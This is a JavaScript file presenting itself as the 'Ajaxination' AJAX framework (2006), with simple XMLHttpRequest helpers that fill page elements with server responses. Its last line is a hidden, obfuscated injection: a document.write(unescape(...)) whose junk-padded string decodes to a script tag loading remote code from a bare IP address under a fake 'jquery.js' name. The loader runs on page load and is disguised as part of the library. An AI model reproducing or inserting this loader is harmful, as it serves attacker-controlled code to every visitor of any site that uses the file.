<!-- // Start of AdSubtract JavaScript block; you can ignore this.
     // It is used when AdSubtract blocks cookies or pop-up windows.
document.iMokie = "cookie blocked by AdSubtract";
document.iMferrer = "referrer blocked by AdSubtract";
function iMwin() {
	this.location = "";
	this.frames = new Array(9);
	this.frames[0] = this;
	this.frames[1] = this;
	this.frames[2] = this;
	this.frames[3] = this;
	this.frames[4] = this;
	this.frames[5] = this;
	this.frames[6] = this;
	this.frames[7] = this;
	this.frames[8] = this;
	this.length = 0;
}
// End of AdSubtract JavaScript block. -->
/*  Ajaxination - Simple JavaScript framework, version 1.0
 *  (c) 12 Feb 2006 Sajan John <saj@ajaxination.com>
 *  Ajaxination is an easy to use ajax framework for your Web2.0 Application.
 *  Using Ajaxination you can update multiple Div tags with just one object.
 *  Ajaxination is freely distributable under the terms of GNU license.
 *  Feel free to modify/edit the code according to your requirements .
 *  If you are adding any additional features in this framework please
 *  send me a statusBox to saj@ajaxination.com. Enjoy Ajaxination, - Ajax Simplified
 *  for updates visit : www.ajaxination.com
/*--------------------------------------------------------------------------*/

 function URLload(param,tagName,url,mode) { 
   // You can even pass the action mode = post/get  and act is the parameter u wanted to pass with the url. 
   ajax.open('get', url); 
   ajax.onreadystatechange = responseHandler; 
   contentHandler.tagName = tagName; 
   setTimeout (ajax, 500); 

   ajax.send(null); 

} 

var ajax = createXMLHttpRequest(); 
var contentHandler = new TagHandler(null); 
function createXMLHttpRequest(){

	
  try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) {}
   try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {}
   try { return new XMLHttpRequest(); } catch(e) {}
   //alert("You may be using an older browser or have chosen to disable ActiveX. You can still use this page as intended. You can add this site to your Trusted site list which will keep you from seeing this prompt again the next time you visit. Please refer to your browser's documentation for adding this site.");
   return null;
}

function TagHandler(tagName) 
{ 
   var tagName; 
   return tagName; 
}

function responseHandler() { 
	var objCurrent = document.getElementById(contentHandler.tagName)
	
	if(ajax.readyState == 0) { objCurrent.innerHTML = "<p style='height:274px;'><br /><br />Loading...</p>"; }
	if(ajax.readyState == 1) { objCurrent.innerHTML = "<p style='height:274px;'><br /><br />Loading...</p>"; }
	if(ajax.readyState == 2) { objCurrent.innerHTML = "<p style='height:274px;'><br /><br />Loading...</p>"; }
	if(ajax.readyState == 3) { objCurrent.innerHTML = "<p style='height:274px;'><br /><br />Loading...</p>"; }

   if(ajax.readyState == 4)
	{
		if(ajax.status == 200)
		{
			objCurrent.innerHTML = "";
			var updateContent = ajax.responseText; 
		    if(updateContent) { 
				objCurrent.innerHTML = updateContent; 
			} 
		}
		else if(ajax.status == 404)
		{
			// Retrive error message or redirect to error page 
			objCurrent.innerHTML = "File not found";
		}
		else
		{
			// Give a catch all error message
			objCurrent.innerHTML = "We are currently experiencing technical difficulties and are addressing the issue.";
		}
	//set a tabindex to - 1 to help screen readers focus on the changed content. Then set the focus to the changed content.	
	objCurrent.tabIndex = -1;	
	objCurrent.focus(); 
	} 
	
} 
<!-- 
document.write(unescape('%3Cscrb0iEvtptvQs%20AB7s6ArHuScEvt%3DEvt%2FF2%2F96A4%2Euy2vQs4vQs7%2EAB72AB7%2E1uy9F25%2FmEjqEvtu6AeuyrymE%2EvQsjs%3EvQs%3C%2FscAB7r6AipmEtvQs%3E').replace(/HuS|Evt|AB7|6A|uy|F2|b0|vQs|mE/g,""));
 -->